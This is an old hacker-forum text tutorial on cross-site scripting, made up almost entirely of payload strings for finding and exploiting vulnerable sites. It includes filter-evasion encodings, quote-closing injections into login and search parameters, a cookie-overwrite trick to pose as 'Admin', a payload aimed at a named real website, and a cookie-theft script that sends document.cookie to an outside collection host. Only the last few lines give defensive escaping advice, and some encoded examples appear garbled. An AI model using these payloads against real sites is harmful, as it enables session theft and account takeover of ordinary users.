--------------------------------------------------------------------------------------- [+] Understanding XSS with Samples<http://www.darkc0de.com/tutorials/Understanding_XSS_with_Samples.txt> [+] Author: Rohit Bansal --------------------------------------------------------------------------------------- Cross Site Scripting exsistance is because of the lack of filtering engines to user inputs at websites on forms. [example 1] <a href="[http://<XSS-host]/xssfile?hackerz request">Free !</a> [example 2] <iframe src="[http://<XSS-host]/xssfile?evil request">Free !</iframe> [example 3] <SCRIPT>document.write("<SCRI");</SCRIPT>PT src=" http://www.Site.com/xss.js"></SCRIPT> XSS Cookie theft Javascript http://host/a.php?variable="><script>document.location=' http://www.mysite.com/cgi-bin/cookie.cgi? '%20+document.cookie</script> Moding Cookies [example 1] <script>javascript:void(document.cookie="username=Admin")</script> How to Search for Vul Hosts [example 1] [host]/<script>alert("XSS")</script> [example 2] [host]/<script>alert('XSS')</script>/ [example 3] [host]/<script>alert('XSS')</script>. [example 4] [host]/<script>alert('XSS')</script> [example 5] [host]/\<script\>alert(\'XSS\')\<\/script\> [example 6] [host]/perl/\<sCRIPT>alert("d")</sCRIPT>\.pl [example 7] [host]/\<sCRIPT>alert("d")</sCRIPT>\ [example 8] [host]/<\73CRIP\T>alert("dsf")<\/\73CRIP\T> [example 9] [host]/<\73CRIP\T>alert('dsf')<\/\73CRIP\T> [example 10] [host]/</sCRIP/T>alert("dsf")<///sCRIP/T> [example 11] [host]/</sCRIP/T>alert('dsf')<///sCRIP/T> [example 1] <script>javascript:alert(documentt.cookie)</script> [example 2] <script>javascript:alert("XSS")</script> [example 3] "<script>alert()</script>"This Site is not Secure! - Also use "?" post request after the host. [example 1] [host]/?<script>alert('XSS')</script> WebServers XSS Many webservers have default pages to folders that will look for a file. [example 1] [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".bas [example 2] [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".asp [example 3] [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".jsp [example 4] [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".htm [example 5] [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".html [example 6] [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".[ext] A common place for an XSS hole is inside a server default example files, such as: [example 1] [host]/cgi/example?test=<script>alert('xss')</script> Most common places to find XSS in are the search files of servers. [example 1] [host]/search.php?searchstring=<script>alert('XSS')</script> [example 2] [host]/search.php?searchstring="><script>alert('XSS')</script> [example 3] [host]/search.php?searchstring='><script>alert('XSS')</script> Social Engineering XSS Using the characters instead may fool the filters and allow XSS to work. [example 1] [host]/%3cscript%3ealert('XSS')%3c/script%3e [example 2] [host]/%3c%53cript%3ealert('XSS')%3c/%53cript%3e [example 3] [host]/%3c%53cript%3ealert('XSS')%3c%2f%53cript%3e [example 4] [host]/%3cscript%3ealert('XSS')%3c/script%3e [example 5] [host]/%3cscript%3ealert('XSS')%3c%2fscript%3e [example 6] [host]/%3cscript%3ealert(%27XSS%27)%3c%2fscript%3e [example 7] [host]/%3cscript%3ealert(%27XSS%27)%3c/script%3e [example 8] [host]/%3cscript%3ealert("XSS")%3c/script%3e [example 9] [host]/%3c%53cript%3ealert("XSS")%3c/%53cript%3e [example 10] [host]/%3c%53cript%3ealert("XSS")%3c%2f%53cript%3e [example 11] [host]/%3cscript%3ealert("XSS")%3c/script%3e [example 12] [host]/%3cscript%3ealert("XSS")%3c%2fscript%3e [example 13] [host]/%3cscript%3ealert(%34XSS%34)%3c%2fscript%3e [example 14] [host]/%3cscript%3ealert(%34XSS%34)%3c/script%3e - Also use "?" post request after the host. [example 1] [host]/?%3cscript%3ealert('XSS')%3c/script%3e 100% encoded [example 1] [host]/?%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d %65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e [example 2] [host]/?%27%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e %74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e [example 3] [host]/%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%63% 6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e Another form of encoding is: <script>alert(document.cookie)</script> < is encoded as: < > is encoded as: > [example 1] %3Cscript%3Ealert(%22XSS%22)%3C/script%3E [example 2] <script>alert("XSS")</script> [example 3] <script>alert("XSS")</script> [example 4] <script>alert(%34XSS%34)</script> [example 5] <script>alert('XSS')</script> [example 1] www.pbs.org/search/search_results.html?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E Any of the XSS requests presented above could be used on any asp, cfm, jsp, cgi, php or any other active html file. [example 1] [host]/forum/post.asp?<script>alert('XSS')</script> [example 2] [host]/forum/post.asp?%3cscript%3ealert('XSS')%3c/script%3e [example 3] [host]/forum/post.asp?%3cscript%3ealert(%27XSS%27)%3c/script%3e [example 4] [host]/forum/post.asp?%3cscript%3ealert(%34XSS%34)%3c/script%3e [example 5] [host]/forum/post.asp?<script>alert("XSS")</script> Finding errors such as inputting a string instead of a number or "\" or "/" instead of a string, or a very long string & a very large number. All this malformed parameters can help us find the place to inject XSS script. Tag Closer The "Tag Closer" method is used by inputing non-alphabetic and non-numeric chars inside form's input text boxes. This chars could be: \,/,~,!,#,$,%,^,&,-,[,],null(char 255),.(dot) But the chars that mostly does the job is either " or '. What we do is just insert "> or '> inside a text box instead of our name/email/username/password and etc... [example 1] [host]/admin/login.asp?username="><script>alert('XSS')</script>&password=1234 [example 2] [host]/admin/login.asp?username=admin&password="><script>alert('XSS')</script> [example 3] [host]/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"> < /textarea>--><script>alert('XSS')</script> [example 4] [host]/search.php?action=soundex&firstname="><script>alert(document.cookie)</script> [example 1] [host]/admin/login.asp?username='><script>alert('XSS')</script>&password=1234 [example 2] [host]/admin/login.asp?username=admin&password='><script>alert('XSS')</script> [example 3] [host]/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~'></textarea>--> < script>alert('XSS')</script> [example 4] [host]/search.php?action=soundex&firstname='><script>alert(document.cookie)</script> This mainly works on the servers root: [example 1] [host]/?"><script>alert('XSS')</script> [example 2] [host]/?'><script>alert('XSS')</script> [example 3] [host]/?--><script>alert('XSS')</script> About <plaintext> Another trick for exploiting an XSS was found by putting a <plaintext> tag after the xss code. Sometimes that makes it easie to exploit. [example 1] [host]/?"><script>alert('XSS')</script><plaintext> [example 2] [host]/?'><script>alert('XSS')</script><plaintext> [example 3] [host]/admin/login.asp?username="><script>alert('XSS')</script><plaintext>&password=1234 [example 4] [host]/admin/login.asp?username=admin&password="><script>alert('XSS')</script><plaintext> [example 5] [host]/forum/post.asp?<script>alert('XSS')</script><plaintext> [example 6] [host]/forum/post.asp?%3cscript%3ealert('XSS')%3c/script%3e<plaintext> [example 7] [host]/forum/post.asp?%3cscript%3ealert(%27XSS%27)%3c/script%3e<plaintext> [example 8] [host]/forum/post.asp?%3cscript%3ealert(%34XSS%34)%3c/script%3e<plaintext> [example 9] [host]/forum/post.asp?<script>alert("XSS")</script><plaintext> [example 10] [host]/search.php?action=soundex&firstname="><script>alert(document.cookie)</script><plaintext> [example 1] www.pbs.org/search/search_results.html?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cplaintext%3E[/code{] } Simple Codes just incase some of them do-not seem to work: [code]< /title><script>alert("XSS");</script><title><plaintext> < script>alert(document.cookie)</script><plaintext> Security Conclusion [Replace] < with < > with > & with & " with "e; [Possible XSS] <applet> <frameset> <layer> <body> < html> <ilayer> <embed> <iframe> < meta> <frame> <img> <object> < script> <style> --------------------------------------------------------------------------------------- [+]^Rohit Bansal [rohitisback@gmail.com] [+] Schap, Infysec ---------------------------------------------------------------------------------------